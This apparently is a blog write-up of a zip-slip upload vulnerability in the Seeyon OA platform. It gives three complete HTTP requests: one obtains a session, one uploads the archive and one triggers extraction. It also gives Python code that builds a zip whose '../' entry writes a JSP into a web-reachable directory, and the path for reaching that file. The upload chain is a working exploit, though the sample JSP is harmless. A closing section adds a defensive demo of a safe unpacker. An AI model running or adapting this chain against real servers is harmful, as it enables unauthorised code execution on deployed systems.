I came across this vulnerability, but exploiting it requires uploading a zip archive, and the PoCs circulating online do not provide that zip. So I had no choice but to analyze it from scratch.

The PoC circulating online: https://blog.csdn.net/maverickpig/article/details/118916085

It consists of three requests.

Request 1 is used to obtain a Session:
```http
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
```
Request 2 uploads the zip (the code that builds the zip follows further down). The Cookie carries the Session returned by request 1:

```http
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: <Session obtained in request 1>
Content-Length: 528
Content-Type: multipart/form-data; boundary=2a0e9dd602fea2b6f80d3a5db1d11591

--2a0e9dd602fea2b6f80d3a5db1d11591
Content-Disposition: form-data; name="file"; filename="y.zip"

<zip content>
--2a0e9dd602fea2b6f80d3a5db1d11591--
```
Building the zip: when I looked at the structure of the archives shown online, I noticed a difference, specifically as follows.

So it only needs to be reproduced in code; the following generates y.zip (an empty layout.xml entry first, then the payload entry whose name starts with ../ so that it is written outside the extraction directory):
```python
import io
import zipfile


def write_zipFile(Filename, Content):
    # mode='w' so that re-running the script does not append duplicate entries
    # to an already existing y.zip
    with zipfile.ZipFile("y.zip", mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('layout.xml', "")     # empty layout.xml, expected by the unpacker
        zf.writestr(Filename, Content)    # entry name carries the ../ traversal


Filename = "../7891.jsp"
# JSP that prints Hello and then deletes itself from disk
Content = "<% out.println(new String(\"Hello\"));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>"
write_zipFile(Filename, Content)
```
If you would rather not write the zip to disk, build it in memory with the following code instead; it returns the raw bytes to put in the upload body:

```python
import io
import zipfile


def custom_build_zip(path, content):
    # Same layout as y.zip, but assembled in a BytesIO buffer and returned as bytes
    zip_buffer = io.BytesIO()
    with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('layout.xml', "")
        zf.writestr("../" + path, content)   # ../ prefix makes the entry escape the unpack dir
    return zip_buffer.getvalue()
```
After the zip has been uploaded, an ID is returned in the response body.

Finally, request 3 triggers the extraction. The arguments parameter is the URL-encoded JSON array [0,"日期","<ID>"], with the ID taken from the upload response:
```http
POST /seeyon/ajax.do HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: <Session obtained in request 1>
Content-Type: application/x-www-form-urlencoded
Content-Length: 157

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22日期%22%2C%22<ID from the upload response>%22%5D
```
After extraction, the JSP is reachable at the following path (the file name is the one used in the zip entry, without the ../ prefix; note that the sample JSP deletes itself on first execution, so it only answers once):

http://localhost/seeyon/common/designer/pageLayout/<jsp file name from the zip>
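The whole chain rests on the unpacker honouring the ../ in the entry name. The following added example (my own code, not the page's PoC and not Seeyon's code) builds an archive in the same shape as y.zip, shows what a traversal-blind unpacker does with it, and places next to it the containment check that a hardened unpacker needs. The scratch directory layout (pageLayout/<id>/ as extraction directory), the id 12345 and the marker payload are made up for the demonstration.

```python
import io
import os
import tempfile
import zipfile

# Constructed stand-in for the page's JSP payload; any bytes would do here.
PAYLOAD = b"<%-- constructed marker, not the page's JSP --%>"


def build_zip(entries):
    """Build an archive in memory in the shape the page's y.zip has: an empty
    layout.xml first, then each payload entry with its name written verbatim."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("layout.xml", "")
        for name, data in entries.items():
            zf.writestr(name, data)  # zipfile does not sanitise names on write
    return buf.getvalue()


def unsafe_extract(zip_bytes, dest):
    """Reconstruction of what a zip-slip-vulnerable unpacker effectively does:
    join dest and the entry name with no normalisation and no containment check.
    Returns the real paths of the files written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def safe_extract(zip_bytes, dest):
    """Hardened unpacker: every entry is resolved against dest and refused if its
    real path does not stay inside it. Returns (extracted_names, rejected_names)."""
    root = os.path.realpath(dest)
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Absolute names, drive letters and backslashes are rejected outright;
            # the realpath/commonpath check below catches ../ and symlinked parents.
            if os.path.isabs(name) or os.path.splitdrive(name)[0] or "\\" in name:
                rejected.append(name)
                continue
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:
                rejected.append(name)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as fh:
                    fh.write(zf.read(info))
            extracted.append(name)
    return extracted, rejected


def demo():
    """Run both unpackers inside a scratch tree that mimics the target layout
    (pageLayout/<id>/ is the extraction dir, pageLayout/ its parent; the ids are
    made up). Returns the observations as a dict."""
    malicious = build_zip({"../7891.jsp": PAYLOAD})
    benign = build_zip({"7891.jsp": PAYLOAD})
    with tempfile.TemporaryDirectory() as scratch:
        page_layout = os.path.join(scratch, "pageLayout")
        dest = os.path.join(page_layout, "12345")
        os.makedirs(dest)
        written = unsafe_extract(malicious, dest)
        root = os.path.realpath(dest)
        escaped = [p for p in written if os.path.commonpath([root, p]) != root]
        safe_dest = os.path.join(page_layout, "12345_safe")
        os.makedirs(safe_dest)
        ok, bad = safe_extract(malicious, safe_dest)
        ok_benign, bad_benign = safe_extract(benign, os.path.join(page_layout, "67890"))
        return {
            "entry_names": zipfile.ZipFile(io.BytesIO(malicious)).namelist(),
            "escaped": escaped,
            "landed_in_parent": os.path.exists(os.path.join(page_layout, "7891.jsp")),
            "safe_extracted": ok,
            "safe_rejected": bad,
            "benign_extracted": ok_benign,
            "benign_rejected": bad_benign,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two points worth keeping in mind when testing locally: Python's own ZipFile.extractall strips ../ components, so it cannot be used to confirm that the archive traverses, which is why unsafe_extract joins the paths by hand; and the check that matters on the server side is the realpath containment test, not a substring search for "..", since a prefix such as "pageLayout/../" or a symlinked parent slips past the latter.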